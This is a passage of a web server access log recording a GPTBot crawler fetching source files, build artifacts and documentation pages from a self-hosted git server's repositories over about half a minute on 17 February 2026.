GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18095] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" +[17/Feb/2026:15:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12761] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" +[17/Feb/2026:15:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" +[17/Feb/2026:15:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode%2flaunch.json" [Client 74.7.227.38] [Length 21957] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" +[17/Feb/2026:15:48:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/services/geminiService.ts" +[17/Feb/2026:15:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/services/geminiService.ts" +[17/Feb/2026:15:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" +[17/Feb/2026:15:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:15:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15815] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18133] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20919] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10086] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" +[17/Feb/2026:15:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12945] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11823] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10312] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9955] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15767] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9967] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12632] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10436] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" +[17/Feb/2026:15:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:15:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17256] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11315] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11522] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 